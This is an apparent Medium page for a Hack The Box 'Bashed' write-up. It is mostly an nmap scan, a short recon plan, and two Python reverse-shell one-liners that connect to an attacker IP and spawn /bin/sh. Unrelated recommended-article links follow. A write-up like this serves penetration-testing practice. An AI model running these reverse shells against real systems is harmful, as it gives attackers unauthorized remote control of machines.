Bashed — Hack The Box WriteUp

nmap -p- [bashedIP]
  1. A deeper nmap scan (with the -A, -T4 and scripts options).
  2. Explore the web page ourselves (for potential areas for SQL injections or anything else).
  3. Start a directory buster on the IP since it is hosting a web server.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.34",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.34",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

{UPDATE} RC Airplane - Flight simulator Hack Free Resources Generator

Looking Back on the Equifax Hack and Why the Credit Reporting System is Broken

Contextual bandits are rolling into town — here’s what you need to know

These are the phones that will be incompatible with WhatsApp at the end of May

Have a Good Night Sleep With Memory FoamMattresses. https://t.co/DgxGBxl2Uc

CyberDragon Recent Updates & Plans

{UPDATE} Classic snake Hack Free Resources Generator

Zkpad

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
VulnHunter

VulnHunter

More from Medium

Previse hackthebox Walkthrough

Learning from HTB Challenges — 1

Kioptrix: Level 1 [Vulnhub] Walkthrough

Brute It [TryHackMe Writeup]